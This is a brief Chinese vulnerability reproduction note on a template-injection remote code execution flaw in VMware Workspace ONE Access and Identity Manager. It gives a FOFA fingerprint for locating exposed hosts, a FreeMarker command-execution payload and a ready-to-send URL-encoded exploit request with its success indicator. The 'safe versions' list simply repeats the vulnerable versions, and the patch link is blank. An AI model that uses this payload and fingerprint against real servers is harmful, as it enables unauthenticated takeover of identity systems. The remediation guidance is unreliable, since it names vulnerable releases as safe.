一、漏洞描述
VMware Workspace ONE Access 及 Identity Manager 存在一个由服务器模板注入导致的远程命令执行漏洞,未经身份验证的攻击者可以利用此漏洞进行远程任意代码执行。
二、影响版本
- Linux Linux Kernel * * *
- Vmware Identity Manager 3.3.3 * * *
- Vmware Identity Manager 3.3.4 * * *
- Vmware Identity Manager 3.3.5 * * *
- Vmware Identity Manager 3.3.6 * * *
- Vmware Vrealize Automation * * * *
- Vmware Vrealize Automation 7.6 * * *
- Vmware Workspace One Access 20.10.0.0 * * *
- Vmware Workspace One Access 20.10.0.1 * * *
- Vmware Workspace One Access 21.08.0.0 * * *
- Vmware Workspace One Access 21.08.0.1 * * *
三、漏洞环境
fofa:icon_hash="-1250474341"
四、漏洞复现
poc:
${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d
返回状态为200,且包涵Authorization context is not valid
五、更新建议
1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
2、使用安全版本
- Vmware Cloud Foundation * * * *
- Vmware Vrealize Suite Lifecycle Manager * * * *
- Linux Linux Kernel * * *
- Vmware Identity Manager 3.3.3 * * *
- Vmware Identity Manager 3.3.4 * * *
- Vmware Identity Manager 3.3.5 * * *
- Vmware Identity Manager 3.3.6 * * *
- Vmware Vrealize Automation * * * *
- Vmware Vrealize Automation 7.6 * * *
- Vmware Workspace One Access 20.10.0.0 * * *
- Vmware Workspace One Access 20.10.0.1 * * *
- Vmware Workspace One Access 21.08.0.0 * * *
- Vmware Workspace One Access 21.08.0.1 * * *
774
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
